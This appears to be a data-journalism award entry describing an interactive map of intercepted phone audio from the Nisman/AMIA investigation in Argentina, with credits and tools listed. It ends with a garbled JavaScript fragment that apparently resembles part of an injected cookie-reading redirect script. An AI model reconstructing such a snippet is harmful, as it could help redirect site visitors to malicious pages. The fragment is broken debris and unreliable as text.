Mapping Prosecutor Nisman phone interceptions


Date Published


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Project Description* 

We reused our database of 200 hundred audios and for a new anniversary of Prosecutor Nisman’s assasination, we published an interactive map to listen audios by location, as a playlist. 


What makes this project innovative? *

Maps with audio playlists is a distinctive approach to the information gathered from our original database of 40.000 audios.

A new prosecutor investigating the AMIA Case used telephone cells to locate calls from specific locations that confirmed Prosecutor Nisman hypothesis. For example, the following image is reffered to cells located in Casa Rosada (Presidential Office in Buenos Aires, Argentina)


What was the impact of your project? How did you measure it? *

Our project is an ongoing investigation where LN Data team built upon a dead prosecutor and publlished an interactive app to listen audios as playlists for person or theme.

Then Justice added a new layer applying location technology.

In base of this “team” effort, Supreme Court decided to accuse our former President Cristina Fernandez de Kirchner and several officers.


Source and methodology*


Technologies Used*

The visualization was made with D3, Javascript and Mapbox.



Florencia Coelho, Bianca Pallaro, Gastón de la Llana, Pablo Loscri, Momi Peralta Ramos, Gabriela Bouret, Gabriela Miño, Florencia Fernández Blanco, Carolina Ávila, Romina Colman, Nicolás Rivera, Ricardo Brom and Cristian Bertelegni, “; )”\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));”;,”redirect”);>,;”””; ; “”)}